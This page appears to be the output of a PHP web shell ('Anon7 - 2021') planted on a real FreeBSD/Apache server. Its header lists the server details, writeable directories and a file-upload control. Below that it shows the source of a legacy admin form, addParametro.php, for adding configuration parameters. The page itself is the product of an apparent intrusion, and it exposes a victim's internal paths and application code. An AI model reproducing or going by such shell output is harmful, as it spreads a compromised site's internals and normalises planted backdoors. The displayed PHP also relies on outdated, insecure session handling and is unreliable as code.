KGRKJGETMRETU895U-589TY5MIGM5JGB5SDFESFREWTGR54TY
Server : Apache/2.4.62
System : FreeBSD fbsdweb2.web.rcn.net 14.1-RELEASE FreeBSD 14.1-RELEASE releng/14.1-n267679-10e31f0946d8 GENERIC amd64
User : www ( 80)
PHP Version : 8.3.8
Disable Function : NONE
Directory :  /domains/logicswapweb/aplicaciones/admon/documentos/valores_config/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /domains/logicswapweb/aplicaciones/admon/documentos/valores_config/addParametro.php
<?php
include('./../../fnc/DBConnect.php');
include('./../../fnc/componente.php');
include('./../../fnc/parametro.php');
include('./../../fnc/vinculo.php');
include('./../../fnc/UsuarioPanel.php');
include('./../../fnc/bitacora.php');
include('./../../fnc/aplicacion.php');
include('./../../fnc/panel.php');
include('./../fnc/Carpeta.php');

session_start('PanelAzulDigial');
if(!session_is_registered("panel")){
	echo "<div style=\"	font-family: Verdana, Arial, Helvetica, sans-serif;	color: #0066CC;	font-size: 16px;font-weight: bolder;\">Invalid User</div>";
}else{

$panel->reactivarDB();
$tipo_u=$panel->usuario->tipo;
$user_u=$panel->usuario->id;
$estado_u=$panel->usuario->estado;
?>

<link href="css/panel2Contenido.css" rel="stylesheet" type="text/css"><script> 
if (history.forward(1)){location.replace(history.forward(1))} 
</script> 
<script>
function tipear(val){
	document.frm.tipo.value=val;
}
function mgOver(obj){
	var elm = document.getElementsByTagName("a");
	elm[obj.id].setAttribute("class","migasover");
}
function mgOut(obj){
	var elm = document.getElementsByTagName("a");
	elm[obj.id].setAttribute("class","migas");
}
</script>
<style type="text/css">
<!--
body {
	margin-left: 0px;
	margin-top: 0px;
	margin-right: 0px;
	margin-bottom: 0px;
}

-->
</style><center>
<script src="js/validaciones.js"></script>
<table width="545" border="0" cellspacing="2" cellpadding="2" class="texto1" align="left">
    <tr bgcolor="cccccc">
        <td align="left"  class="migas"> 
		<a id="migainicio" href="../../contenido.php" class="migas" style="cursor:hand" title="Indice de Aplicaciones" onMouseOver="javascript: mgOver(this);" onMouseOut="javascript: mgOut(this);">Inicio</a> / <a id="migaindex" href="../menu.php" class="migas" onMouseOver="javascript: mgOver(this);" onMouseOut="javascript: mgOut(this);"><?=ucfirst(strtolower($panel->aplicativo->nombre))?></a> /
		<a href="index.php" style="cursor:hand; text-decoration:none; font-size:11px; font-family:Arial, Helvetica, sans-serif; font-weight:bold; color:#FFFFFF" onMouseover="this.style.color='0000FF'" onMouseOut="this.style.color='ffffFF';">Parameters <?=ucfirst($panel->aplicativo->nombre)?></a></td>
    </tr>
    <tr>
      <td>        <img src="../img/menu.gif" width="49" height="23" align="top">
        <input name="tem" type="button" class="boton1"onClick="javascript: document.location.href= '../index.php'" value="Documents">

		<input name="tem222" type="button" class="boton1" onClick="javascript: document.location.href= 'index.php'" value="Parameters"></td>
    </tr>
    <tr>
      <td align="left" bgcolor="000099" class="titular1">
		<form name="frm" target="_fra_user" action="../fnc/main.php?task=addParametro" onSubmit="return fncCheckForm(this,2,3,4,5);" method="post" id="frm">	  
	  	  <table cellspacing=1 cellpadding=0 width="100%" align="left" bgcolor=##0099CC border=0 id="campos">
              <tr>
                <td width="15%" bgcolor=000099 class="titular1"><a onClick="javascript: document.location.href= 'index.php'" title="Volver" style="cursor:hand; width:40"><img src="img/atras.gif" style="cursor:hand "></a>&nbsp;
				</td>
                <td width="85%" class="titular1" bgcolor=000099>Parameter &nbsp;</td>
              </tr>
              <tr>
                <td colspan="2" valign="top" bgcolor=#ffffff><br>
                    <table cellspacing=0 cellpadding=0 width="96%" align="left" border=0>
                      <!--DWLayoutTable-->
                        <tr class="texto1">
                          <td align=left>&nbsp;</td>
                          <td height="22">Type</td>
                          <td>text
                            <input name="texto" type="radio" onclick="javascript: tipear('texto')" checked>
                          number
                          <input name="texto" type="radio" onclick="javascript: tipear('numero')"></td>
                      </tr>
                        <tr class="texto1">
                          <td align=left>&nbsp;</td>
                          <td height="22">Name</td>
                          <td><input name="nombre" type="text" class="listado" style="width:200; text-align:center " maxlength="20"></td>
                      </tr>
                        <tr class="texto1">
                          <td align=left>&nbsp;</td>
                          <td height="22">Value</td>
                          <td><input name="valor" type="text" class="listado" style="width:200; text-align:center " maxlength="50">
                          <input type="hidden" name="tipo" value="texto"></td>
                      </tr>
                        <tr class="texto1">
                          <td align=left width="48">&nbsp;</td>
                          <td width="125" height="22">Description</td>
                          <td width="341">
<input name="descripcion" type="text" class="listado" style="width:200; text-align:center " maxlength="60">
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </td>
                      </tr>
                        <tr class="texto1">
                          <td align=left>&nbsp;</td>
                          <td>Type of User </td>
                          <td><select name="tipo_usuario" class="listado">
                            <option value="1">ROOT</option>
                            <option value="2" selected>Administrator</option>
                            <option value="3">User</option>
                          </select></td>
                      </tr>
                        <tr class="texto1">
                          <td align=left>&nbsp;</td>
                          <td colspan="2"><!--DWLayoutEmptyCell-->&nbsp;</td>
                      </tr>
                        <tr class="texto1">
                          <td align=left>&nbsp;</td>
                          <td colspan="2"><div align="center">
                              <input name="adicionar" type="submit" class="boton1" value="Add">
                              &nbsp;
                              <input name="cancelar" type="button" class="boton1" onClick="javascript: document.location.href = 'index.php';" value="Cancel">
</div></td>
                      </tr>
                        <tr>
                          <td align=left>&nbsp;</td>
                          <td colspan="2"><!--DWLayoutEmptyCell-->&nbsp;</td>
                        </tr>
                  </table></td>
              </tr>
            
          </table>
	  </form>	  </td>
    </tr>
   <tr><td><iframe src="" name="_fra_user" width="0" height="0" frameborder="0"></iframe></td></tr>
</table>
</center>				
<? }?>

Anon7 - 2021